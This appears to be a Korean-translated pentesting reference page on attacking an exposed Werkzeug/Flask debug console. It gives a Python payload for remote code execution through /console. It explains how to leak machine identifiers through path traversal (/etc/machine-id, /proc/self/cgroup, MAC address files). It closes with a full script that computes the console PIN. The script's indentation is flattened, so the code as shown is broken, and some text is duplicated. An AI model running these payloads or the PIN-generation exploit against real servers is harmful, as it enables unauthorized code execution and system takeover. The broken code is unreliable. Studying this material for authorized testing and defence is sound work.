Werkzeug / Flask Debug

웹 앱, 네트워크 및 클라우드에 대한 해커의 관점을 얻으세요.

실제 비즈니스에 영향을 미치는 중요한 취약점을 찾아보고 보고하세요. 공격 표면을 매핑하고 권한 상승을 허용하는 보안 문제를 찾아내며, 필수 증거를 수집하기 위해 자동화된 익스플로잇을 사용하여 귀하의 노력을 설득력 있는 보고서로 전환하는 20개 이상의 맞춤형 도구를 사용하세요.

Penetration testing toolkit, ready to usePentest-Tools.com

Console RCE

디버그가 활성화되어 있으면 /console에 접근하여 RCE를 얻으려고 시도할 수 있습니다.

__import__('os').popen('whoami').read();

인터넷에는 이것과 같은 여러 익스플로잇이 있습니다. 또는 메타스플로잇에서 하나를 찾을 수 있습니다.

핀 보호 - 경로 탐색

일부 경우 /console 엔드포인트는 핀으로 보호됩니다. 파일 탐색 취약점이 있는 경우 해당 핀을 생성하는 데 필요한 모든 정보를 유출할 수 있습니다.

Werkzeug 콘솔 PIN 익스플로잇

앱에서 디버그 오류 페이지를 강제로 표시하여 이를 확인하십시오:

The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server

A message regarding the "console locked" scenario is encountered when attempting to access Werkzeug's debug interface, indicating a requirement for a PIN to unlock the console. The suggestion is made to exploit the console PIN by analyzing the PIN generation algorithm in Werkzeug’s debug initialization file (__init__.py). The PIN generation mechanism can be studied from the Werkzeug source code repository, though it is advised to procure the actual server code via a file traversal vulnerability due to potential version discrepancies.

콘솔 PIN을 악용하기 위해 두 세트의 변수가 필요합니다:

probably_public_bits

• username: Flask 세션을 시작한 사용자를 나타냅니다.

• modname: 일반적으로 flask.app으로 지정됩니다.

• getattr(app, '__name__', getattr(app.__class__, '__name__')): 일반적으로 Flask로 해결됩니다.

• getattr(mod, '__file__', None): Flask 디렉토리 내의 app.py에 대한 전체 경로를 나타냅니다 (예: /usr/local/lib/python3.5/dist-packages/flask/app.py). app.py가 적용되지 않는 경우, app.pyc를 시도하십시오.

private_bits

• uuid.getnode(): 현재 머신의 MAC 주소를 가져오며, str(uuid.getnode())는 이를 10진수 형식으로 변환합니다.

• 서버의 MAC 주소를 확인하기 위해, 앱에서 사용되는 활성 네트워크 인터페이스를 식별해야 합니다 (예: ens3). 불확실한 경우, /proc/net/arp를 누출하여 장치 ID를 찾고, /sys/class/net/<device id>/address에서 MAC 주소를 추출하십시오.

• 16진수 MAC 주소를 10진수로 변환하는 방법은 아래와 같습니다:

# 예시 MAC 주소: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

• get_machine_id(): /etc/machine-id 또는 /proc/sys/kernel/random/boot_id의 데이터를 마지막 슬래시(/) 이후의 /proc/self/cgroup의 첫 번째 줄과 연결합니다.

</details>

모든 필요한 데이터를 수집한 후, 익스플로잇 스크립트를 실행하여 Werkzeug 콘솔 PIN을 생성할 수 있습니다:

모든 필요한 데이터를 수집한 후, 익스플로잇 스크립트를 실행하여 Werkzeug 콘솔 PIN을 생성할 수 있습니다. 이 스크립트는 조합된 `probably_public_bits`와 `private_bits`를 사용하여 해시를 생성한 다음, 최종 PIN을 생성하기 위해 추가 처리를 수행합니다. 아래는 이 프로세스를 실행하기 위한 Python 코드입니다:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',  # username
'flask.app',  # modname
'Flask',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
'279275995014060',  # str(uuid.getnode()),  /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)